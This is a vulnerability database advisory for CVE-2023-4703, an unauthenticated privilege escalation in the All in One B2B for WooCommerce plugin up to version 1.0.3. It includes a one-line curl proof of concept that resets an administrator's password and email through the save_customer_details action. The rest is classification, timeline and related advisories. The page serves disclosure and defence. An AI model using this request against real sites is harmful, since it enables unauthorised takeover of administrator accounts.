All in One B2B for WooCommerce <= 1.0.3 – Unauthenticated Privilege Escalation | CVE 2023-4703 | Plugin Vulnerabilities

Description

The plugin does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.

Proof of Concept

curl 'https://example.com/' -d 'action=save_customer_details&customer_id=ADMIN_USER_ID&customer_password=NEW_PASSWORD&customer_email=ADMIN_EMAIL&customer_display_name=Foo'

Affects Plugins

all-in-one-b2b-for-woocommerce

No known fix

References

CVE

Classification

Type

PRIVESC

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

Alexander Concha

Verified

Yes

WPVDB ID

83278bbb-90e6-4465-a46d-60b4c703c11a

Timeline

Publicly Published

2023-09-04 (about 2 years ago)

Added

2023-09-04 (about 2 years ago)

Last Updated

2023-09-04 (about 2 years ago)

Other

Published

Title

Published

2024-04-23

Title

Booking Ultra Pro < 1.1.13 - Authenticated (Contributor+) Privilege Escalation

Published

2025-03-13

Title

Industrial < 1.7.9 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update

Published

2021-07-20

Title

HM Multiple Roles < 1.3 - Arbitrary Role Change

Published

2025-02-24

Title

Private Content <= 8.11.5 - Unauthenticated Privilege Escalation via Account Takeover

Published

2025-08-20

Title

Support Ticket <= 1.9 - Unauthenticated Privilege Escalation